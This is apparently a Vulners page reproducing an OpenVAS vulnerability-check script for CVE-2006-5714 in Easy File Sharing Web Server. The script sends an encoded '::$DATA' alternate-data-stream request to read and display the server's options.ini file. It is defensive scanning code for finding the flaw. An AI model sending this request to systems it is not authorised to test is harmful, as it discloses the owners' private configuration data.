Lucene search
K

Easy File Sharing Web Server Information Disclosure

🗓️ 24 Oct 2008 00:00:00Reported by This script is Copyright (C) 2006 Justin SeitzType 
openvas
 openvas
🔗 plugins.openvas.org👁 13 Views

Easy File Sharing Web Server Information Disclosure vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2006-5714
4 Nov 200601:00
cve
Cvelist
CVE-2006-5714
4 Nov 200601:00
cvelist
Tenable Nessus
Easy File Sharing Web Server Crafted Request ADS Arbitrary File Access
8 Nov 200600:00
nessus
EUVD
EUVD-2006-5699
7 Oct 202500:30
euvd
NVD
CVE-2006-5714
4 Nov 200601:07
nvd
OpenVAS
Easy File Sharing Web Server Information Disclosure
24 Oct 200800:00
openvas
# OpenVAS Vulnerability Test
# $Id: efs_webserver_infodisclose.nasl 5390 2017-02-21 18:39:27Z mime $
# Description: Tries to read a local file via EFS
#
# Authors:
# Justin Seitz <[email protected]>
#
# Copyright:
# Copyright (C) 2006 Justin Seitz
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

tag_summary = "The remote web server is affected by an information disclosure
vulnerability. 

Description :

The version of Easy File Sharing Web Server that is installed on the
remote host fails to restrict access to files via alternative data
streams.  By passing a specially-crafted request to the web server, an
attacker may be able to access privileged information. 

See Also :

http://www.milw0rm.com/exploits/2690";

tag_solution = "Unknown at this time.";

if (description)
{
	# set script identifiers
	script_id(80055);;
	script_version("$Revision: 5390 $");
	script_tag(name:"last_modification", value:"$Date: 2017-02-21 19:39:27 +0100 (Tue, 21 Feb 2017) $");
	script_tag(name:"creation_date", value:"2008-10-24 23:33:44 +0200 (Fri, 24 Oct 2008)");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
	
	script_cve_id("CVE-2006-5714");
	script_bugtraq_id(20823);
	script_xref(name:"OSVDB", value:"30150");

	name = "Easy File Sharing Web Server Information Disclosure";
	summary = "Tries to read a local file via EFS";

	script_name(name);

	script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
	script_copyright("This script is Copyright (C) 2006 Justin Seitz");
	
	script_family("Web application abuses");

	script_dependencies("gb_get_http_banner.nasl");
	script_require_ports("Services/www", 80);
        script_mandatory_keys("EasyFileSharingWebServer/banner");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
	exit(0);

}

include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");

#
#	Verify we can talk to the web server, if not exit
#
port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);


banner = get_http_banner(port:port);
if (!banner || "Server: Easy File Sharing Web Server" >!< banner) exit(0);

#
#	We are sending an encoded request for /options.ini::$DATA to the web server.
#
attackreq = http_get(item:urlencode(str:"/option.ini::$DATA"),port:port);
attackres = http_keepalive_send_recv(port:port, data:attackreq, bodyonly:TRUE);
if (attackres == NULL) exit(0);

if ("[Server]" >< attackres) {
	info = string("Here are the contents of the 'options.ini' configuration file\n",
	"from the remote host: \n\n",attackres);
		
	security_message(data:info, port:port);		
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Feb 2017 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.05315
13